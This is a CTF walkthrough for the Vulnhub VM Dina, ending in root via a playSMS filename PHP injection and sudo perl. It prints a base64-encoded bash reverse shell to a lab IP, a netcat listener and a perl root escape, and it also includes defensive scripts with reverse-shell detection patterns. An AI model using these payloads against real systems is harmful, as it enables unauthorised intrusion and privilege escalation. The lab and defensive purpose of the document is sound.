Dina Walkthrough

[screenshot: dina18]

Hi All,

This post is a walkthrough for Dina 1.0.1 on Vulnhub.

Dina uses DHCP, so you’ll have to find its IP address first. Running netdiscover -r IPRANGE will help you with that.

The first thing to do is run an nmap scan: nmap -sC -sV -v IPADDRESS -oN OUTPUTFILE

[screenshot: dina1]

There’s not much to go off of except a web server. The scan does list the entries from the robots.txt file. Let’s go to the webpage and see what’s there.

[screenshot: dina2]

Not much here, even when looking at the source. Let’s try some of the robots.txt directories.

[screenshot: dina3]

This is not a normal error message. Let’s look at the source.

[screenshot: dina4]

OK, so this is interesting. Somebody thought it was a great idea to put a bunch of passwords in the source of the webpage. This is a very simple example of security by obscurity, and it doesn’t work. Unfortunately, we don’t have anything to try the passwords on yet. The other robots.txt directories didn’t turn up anything. Let’s do some more enumeration.

Running nikto against the site (nikto -h IPADDRESS) gives us some more directories to look at. One of them is called secure … that might be interesting.

[screenshot: dina5]

[screenshot: dina6]

Inside the secure directory is a file called backup.zip. I couldn’t unzip it with the native Kali tools, so I copied it to Windows and used 7-Zip. It prompts for a password. Luckily, we have a few to try.

[screenshot: dina7]

The first password in the list (freedom) worked, and I was able to extract the mp3 file. Sometimes in CTFs, challenges are hidden inside audio files. I was all prepared with my audio editor, except the file wouldn’t load. It wasn’t an mp3.

[screenshot: dina8]

Running file against the mp3 revealed that it was just a text file.

I renamed the file to a text file and took a look at it.
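The check that file did here, trusting the leading bytes rather than the extension, is worth having in your own tooling. The following is an added example and not code from the post: a small content-based identifier with an extension-mismatch check. The sample bytes are constructed for the demonstration and are not the real contents of backup.zip.

```python
import string

# Signatures checked in order; more specific ones first.
MAGIC = [
    (b"ID3", "mp3 (ID3 tag)"),
    (b"PK\x03\x04", "zip"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"%PDF-", "pdf"),
    (b"\x7fELF", "elf"),
]
# What each extension claims to be, in the vocabulary identify() returns.
EXT_TO_KIND = {"mp3": "mp3", "zip": "zip", "png": "png", "jpg": "jpeg",
               "jpeg": "jpeg", "pdf": "pdf", "txt": "text"}
TEXT_BYTES = frozenset(string.printable.encode("ascii"))


def identify(data: bytes) -> str:
    """Classify data by its leading bytes, the way file(1) does, ignoring any filename."""
    for signature, kind in MAGIC:
        if data.startswith(signature):
            return kind
    # Raw MPEG audio without an ID3 tag starts with an 11-bit frame sync (0xFFE).
    if len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0:
        return "mp3 (MPEG frame)"
    # Only printable ASCII in the first 512 bytes: call it text.
    if data and all(b in TEXT_BYTES for b in data[:512]):
        return "text"
    return "unknown binary"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension claims a type the content does not match."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXT_TO_KIND.get(ext)
    actual = identify(data).split()[0]
    return claimed is not None and claimed != actual


# Constructed samples (not the real archive contents): the "mp3" that is
# really text, a genuine ID3-tagged mp3 header, and a zip header.
SAMPLES = {
    "backup.mp3": b"a user name and a login URL would be in here\n",
    "song.mp3": b"ID3\x04\x00\x00\x00\x00\x00\x00",
    "backup.zip": b"PK\x03\x04\x14\x00\x00\x00",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        flag = "MISMATCH" if extension_mismatch(name, data) else "ok"
        print(f"{name}: {identify(data)} [{flag}]")
```

Running it reports backup.mp3 as text with a MISMATCH, which is exactly the signal that saves you from opening an audio editor on a text file.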

[screenshot: dina9]

This gives us a user name and a new URL with a login page. Let’s check it out!

[screenshot: dina19]

On the page is an application called playSMS. Using the user name touhid and running through the password list from earlier, I was able to log in with the password diana.

[screenshot: dina20]

At this point, I looked for places to upload files or code. There was one place that allowed a file upload, but the file itself never actually got written to the system. I went to Google, searched for playSMS exploits, and found one on Exploit-DB. There are also two Metasploit modules that work on this VM. The manual way is more interesting, though, so I’m going to show that method. If you can’t get it to work, go the Metasploit route.

[screenshot: dina21]

The key here is the filename. After the upload, the system displays the filename. If the filename contains PHP code, that code is executed. In the example, they run the system command uname -a. Let’s try it and see what happens.

[screenshot: dina10]

[screenshot: dina11]

Now we have code execution! The only problem is that slashes (/) are not allowed in filenames, which makes it hard to get a reverse shell. The system does have netcat, but not a version with the gaping security hole (the -e flag). The solution is to encode the command string and have the target decode and run it on its end.

First, let’s find a reverse shell to use. I used this one from pentestmonkey: bash -i >& /dev/tcp/192.168.2.30/7777 0>&1

Now echo that into base64: echo "bash -i >& /dev/tcp/192.168.2.30/7777 0>&1" | base64

This gave me YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== as the encoded string. Yours will be different based on the IP address and port number.

[screenshot: dina12]

So now we have an encoded string that should give us a reverse shell. Next we need to build the filename so that the target decodes and runs it.

Inside the single quotes where we had uname -a, we replace it with: echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== | base64 -d | bash

What this does is echo the string, pipe it into base64 (decoding it with the -d flag), and finally pipe the decoded string into bash for execution.
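From the defender's side, the two payload shapes above (PHP tags in a filename, and a base64 blob fed to base64 -d | bash to dodge the slash filter) are easy to spot in upload logs if you decode the blobs instead of just grepping for slashes. The following is an added example, not code from the post or from playSMS: it inspects uploaded filenames for PHP tags, exec-style calls and decode-to-shell pipelines, decodes any base64 runs it finds, and flags reverse-shell patterns inside the decoded text. The sample upload list is constructed; the base64 string in it is the one from the post.

```python
import base64
import re

# Indicators for user-supplied strings that a PHP app later echoes into a page.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
PHP_EXEC = re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.IGNORECASE)
DECODE_PIPE = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba|da|z)?sh\b", re.IGNORECASE)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
REVERSE_SHELL = re.compile(r"/dev/tcp/|\bbash -i\b|\bnc\b[^|;]*\s-e\s")


def decode_b64_tokens(text: str) -> list:
    """Decode every base64-looking run in text that yields printable ASCII."""
    decoded = []
    for token in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
            plain = raw.decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or not text once decoded
        if plain.strip() and all(ch.isprintable() or ch in "\n\t" for ch in plain):
            decoded.append(plain.strip())
    return decoded


def inspect_filename(name: str) -> dict:
    """Return the indicators found in one uploaded filename, plus any decoded payloads."""
    findings = []
    if PHP_TAG.search(name):
        findings.append("php-tag")
    if PHP_EXEC.search(name):
        findings.append("php-exec-call")
    if DECODE_PIPE.search(name):
        findings.append("base64-decode-to-shell")
    decoded = decode_b64_tokens(name)
    # The slash filter keeps /dev/tcp/ out of the raw name, so look inside the blob.
    if any(REVERSE_SHELL.search(p) for p in decoded):
        findings.append("reverse-shell-in-base64")
    if REVERSE_SHELL.search(name):
        findings.append("reverse-shell")
    return {"filename": name, "findings": findings, "decoded": decoded}


def triage(names) -> list:
    """Keep only the filenames that tripped at least one indicator."""
    return [r for r in map(inspect_filename, names) if r["findings"]]


# Constructed sample: two benign uploads and the two payload shapes from the post.
SAMPLE_UPLOADS = [
    "holiday.jpg",
    "Q3_report_final.pdf",
    "<?php system('uname -a'); ?>.jpg",
    "<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== | base64 -d | bash'); ?>.jpg",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_UPLOADS):
        print(hit["findings"], hit["decoded"])
```

The decode step is what matters: a rule that only looks for slashes or /dev/tcp/ in the raw filename misses the encoded variant entirely, while the decoded text reads as a plain reverse shell.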

Now we need to get our listener set up: nc -nlvp 7777

[screenshot: dina13]

Once the file is uploaded, we get a shell!

[screenshot: dina14]

The first thing I do after this is spawn a better shell: python -c 'import pty; pty.spawn("/bin/sh")'

[screenshot: dina15]

Now I can do things like sudo. Let’s check our sudo permissions with sudo -l.

[screenshot: dina16]

This is awesome! We can run Perl commands as root. Googling for reverse shells, I easily found this one using Perl: perl -e 'exec "/bin/bash";'

The only change is that we’ll have to use the full path to Perl for this to work.
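A sudo rule that hands a user an interpreter with free arguments is a full root shell waiting to happen, which is why sudo -l is the first thing to check in both directions: as the attacker here, and as the administrator who wrote the rule. The following is an added example, not code from the post: a small sudoers audit that parses plain user rules (no aliases) and flags entries granting ALL or a shell-capable program without fixed arguments. The sudoers text is constructed for the demonstration and is not the VM's real file.

```python
import os
import re

# Programs that, if sudo allows them with free arguments, give the caller a
# root shell with no further vulnerability needed (the Perl case in this post).
SHELL_CAPABLE = {
    "perl": "interpreter", "python": "interpreter", "python2": "interpreter",
    "python3": "interpreter", "ruby": "interpreter", "php": "interpreter",
    "lua": "interpreter", "node": "interpreter", "awk": "interpreter", "gawk": "interpreter",
    "sh": "shell", "bash": "shell", "dash": "shell", "zsh": "shell",
    "vi": "editor/pager with shell escape", "vim": "editor/pager with shell escape",
    "less": "editor/pager with shell escape", "more": "editor/pager with shell escape",
    "find": "can run another program", "env": "can run another program",
    "rsync": "can run another program", "tar": "can run another program",
}

# user host=(runas) [TAG: ...] cmd[, cmd]   (simplified sudoers grammar, no aliases)
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text: str) -> list:
    """Return one finding per rule entry that grants ALL or a shell-capable program."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            argv = cmd.split()
            prog = os.path.basename(argv[0])
            if cmd == "ALL":
                reason = "unrestricted (ALL)"
            elif prog in SHELL_CAPABLE and (len(argv) == 1 or "*" in cmd):
                reason = SHELL_CAPABLE[prog]
            else:
                continue  # fixed-argument rules are not flagged by this check
            findings.append({
                "user": m.group("user"),
                "runas": m.group("runas") or "root",
                "command": cmd,
                "nopasswd": nopasswd,
                "reason": reason,
            })
    return findings


# Constructed sample, not the VM's real sudoers.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
touhid          ALL=(root) NOPASSWD: /usr/bin/perl
backup          ALL=(root) NOPASSWD: /usr/bin/rsync
www-data        ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD" if f["nopasswd"] else "password"
        print(f'{f["user"]}: {f["command"]} as {f["runas"]} ({tag}) -> {f["reason"]}')
```

The www-data entry is deliberately left unflagged: sudo matches the arguments exactly, so a rule pinned to one service restart is a very different risk from a bare interpreter. The fix for the touhid rule is the same in either direction: either drop it, or pin it to a specific script with fixed arguments.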

[screenshot: dina16]

ROOT!

Navigating to the root directory and viewing the root flag is now possible.

[screenshot: dina17]

That’s the box. It was definitely beginner level, especially if using Metasploit. Hopefully you found it helpful.

If you want to see a video walkthrough where I also show the Metasploit path, you can view it here on YouTube.

-R3a50n
